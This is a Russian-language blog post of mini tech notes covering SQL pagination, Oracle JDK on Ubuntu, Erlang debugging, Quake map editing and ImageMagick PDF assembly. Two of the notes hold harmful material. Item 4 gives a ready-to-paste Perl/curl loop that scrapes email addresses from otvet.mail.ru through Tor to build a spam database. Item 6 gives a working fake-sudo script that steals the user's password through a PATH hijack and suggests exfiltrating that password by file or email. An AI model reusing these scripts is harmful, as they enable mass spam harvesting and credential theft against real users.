← На главную

Мини заметки – выпуск 15

В этом выпуске: как в Ubuntu установить Oracle JDK, что делать, если в Erlang возникает ошибка emfile, как собрать PDF с помощью ImageMagick, и не только. Предыдущие выпуски мини заметок: четырнадцатый, тринадцатый, двенадцатый, одиннадцатый.

1. Как сделать эффективное разбиение на страницы

Допустим, есть сайт со статьями и ЧПУ вроде /articles/page-5/. Как получить статьи на заданной странице с помощью простого SELECT-запроса?

Простое и неэффективное решение заключается в использовании запроса вроде select * from articles order by published limit N offset M. Это решение неэффективно, потому что требует сканирования M записей в таблице.

Более эффективный вариант – при создании очередной статьи просто писать в базу ее page_number. Тогда запрос приобретет вид select * from articles where page_number = P order by published. Но возникает маленькая проблема. Спрашивается, что делать при удалении статьи или переносе ее в другой раздел? Очевидно, что пересчитывать page_number всех статей в этом случае будет слишком дорого. А что, если не удалять статьи, а только помечать их удаленными (или перенесенными)? При отображении списка статей на месте, где должна быть статья, будет отображаться сообщение вроде «статья удалена/перенесена пользователем таким-то тогда-то».

При этом пересчитывать page_number статей и вычищать создаваемый при использовании такого подхода «мусор» можно по крону, скажем, раз в неделю или раз в месяц. Алгоритм становится чуточку сложнее, если статьи нужно сортировать в обратном порядке (order by published desc), поскольку в select запросе придется запрашивать не одну страницу, а две соседних, но идея остается прежней.

2. Установка Oracle JDK в Ubuntu

Матерые Java-программисты говорят, что OpenJDK – говно. Я не специалист в Java, так что придется поверить им на слово.

Oracle JDK в Ubuntu устанавливается следующим образом:

sudo apt-get remove openjdk\* sudo add-apt-repository ppa:webupd8team/java sudo apt-get update sudo apt-get install oracle-java7-installer

Соглашаемся с лицензионным соглашением. После установки говорим:

java -version

Должны увидеть что-то вроде:

java version "1.7.0_40" Java(TM) SE Runtime Environment (build 1.7.0_40-b43) Java HotSpot(TM) 64-Bit Server VM (build 24.0-b56, mixed mode)

По аналогичной схеме можно установить Java 8 с лямбдочками или сразу несколько версий Java. Версия по умолчанию выбирается так:

sudo update-java-alternatives -s java-7-oracle

Стоит отметить, что многие приложения действительно работают на Oracle JDK заметно быстрее, чем на OpenJDK.

Рецепт был найден на linuxrussia.com.

3. Telnet через SSL

Подцепиться telnet’ом к серверу, использующему SSL, можно так:

openssl s_client -connect light.webmoney.ru:443

Пригодится при отладке.

4. Собираем спам-базу с помощью otvety.mail.ru

Этому баяну уже, наверное, лет десять, тем не менее.

Устанавливаем Tor, открываем консоль, с помощью Ctr+C и Ctr+V вбиваем:

perl -e 'while() { $qid = int(rand()*94000000); $t = `curl --socks5 ⏎ localhost:9050 http://otvet.mail.ru/question/$qid 2>/dev/null`; ⏎ @m = $t =~ m{"http://status\.mail\.ru/\?([^"]+)"}g; ⏎ print join("\n", @m)."\n"; }' | tee 0001.txt

Ждем какое-то время, смотрим, сколько ящиков собрали:

cat *.txt | sort -u | grep -v nobody.mail.ru | wc -l

Собирать можно в несколько потоков.

5. Установка и настройка Radiant под Ubuntu Linux

Radiant – это редактор карт для игр серии Quake.

Сначала ставим OpenArena:

sudo aptitude install openarena openarena-data openarena-server

Качаем бинарный пакет Radiant под Linux с официального сайта. Распаковываем. Копируем каталоги из installs/Q3Pack/install/ в /usr/games. Делаем chmod a+rwx -R на скопированные каталоги. Говорим:

ln -s /usr/share/games/openarena/baseoa /usr/games/baseoa

Запускаем radiant.bin, в качестве игры выбираем Quake III Arena, путь к движку – /usr/games.

Карты, скомпилированные в .bsp, должны лежать в /usr/lib/openarena/baseoa/maps. Для их загрузки запустите OpenArena, войдите в консоль (нажав тильду) и выполните команды:

/sv_pure 0 /devmap map_name

Для загрузки той же карты в Nexuiz, положите bsp-файл в ~/.nexuiz/data/maps, создайте там же файл map_name.mapcfg следующего содержания:

changelevel map_name

Запустите Nexuiz, откройте консоль (Shift + Esc) и скажите:

map map_name

Хорошие туториалы по Radiant лежат здесь и тут.

6. Почему нужно быть осторожным с sudo

Если вы sudo’ер и вас поломали, то злобный хакер может поднять права до рута с помощью скрипта вроде такого:

#!/usr/bin/env perl use strict; use warnings; my $attempts = 0; my $success = 0; while($attempts < 3) { print "[sudo] password for $ENV{USER}: "; system("/bin/stty -echo"); my $password = <STDIN>; chomp($password); print "\n"; system("/bin/stty echo"); if(valid_password($password)) { system("/usr/bin/sudo @ARGV"); $success = 1; last; } else { print "Sorry, try again.\n"; $attempts++; } } print "sudo: $attempts incorrect password attempts\n" unless $success; sub valid_password { my ($password) = @_; my $t = `echo -n '$password\n' | /usr/bin/sudo -S echo VALID 2>&1`; return scalar($t =~ /VALID/); }

Называем sudo, делаем chmod u+x, кладем в какое-нибудь уютное место, например, ~/.hack, после чего прописываем это место в начало $PATH и ждем. Понятно, что в скрипт нужно дописать сохранение пароля в файл или его отправку по почте.

В действительности, с тем же успехом для перехвата паролей можно подменить утилиту su, а также ls и tree для скрытия файлов, ps и top для скрытия процессов и так далее. При желании можно написать полноценный кроссплатформенный user mode руткит, используя один только Perl.

7. Как в Erlang лечить ошибку emfile

Эта ошибка означает, что кто-то наоткрывал файловых дескрипторов и не закрыл их. Попытаться найти виновников можно, например, вбив в remsh такую команду:

lists:sort(fun({_,A},{_,B}) -> length(A) > length(B) end, ⏎ [{Pid, Ports} || {Pid,Ports} <- [{Pid, [L || L <- element(2,⏎ process_info(Pid, links)), is_port(L)]} || Pid <- processes()], ⏎ length(Ports) > 0]).

Рецепт был найден в рассылке erlang-programming.

8. Использование erl_tidy

Если у вас в команде нет единого мнения относительно того, как нужно оформлять код (сколько пробелов использовать в отступах и так далее), можно поступить следующим образом. Пишите каждый как хочет, а затем прогоняйте код через утилиту erl_tidy:

cd ./src erl -s erl_tidy dir

Аналогичный инструмент есть почти для любого языка программирования.

9. Как в Linux сделать скриншот сайта

Способ первый:

sudo apt-get install python-qt4 libqt4-webkit python-pip xvfb wget http://git.io/xexXPA -O ~/bin/webkit2png chmod u+x ~/bin/webkit2png sudo xvfb-run --server-args="-screen 0, 1024x768x24" \ /home/eax/bin/webkit2png -o eaxme.png http://eax.me

Способ второй:

sudo apt-get install cutycapt cutycapt --url=http://eax.me --javascript=off --out=eaxme.png

К сожалению, и webkit2png, и cutycapt повисают на больших страницах.

10. Сборка и оптимизация PDF с помощью ImageMagick

Если у вас есть сканы некого документа или книги, вы можете собрать из них PDF:

# преобразуем jpg-сканы в ч/б png ls *.jpg | parallel -j 2 --eta convert '{}' -colorspace Gray \ -resize 640x -type Palette -colors 16 -white-threshold 90% \ -black-threshold 10% 'png/{.}.png' # объединяем полученные png-файлы в pdf: convert png/*.png -quality 100 -units PixelsPerInch \ -density 72 result.pdf

Чтобы PDF получался качественный и при этом сравнительно небольшого размера, каждая страница должна весить 16-18 Кб.

Дополнение: Мини заметки – выпуск 16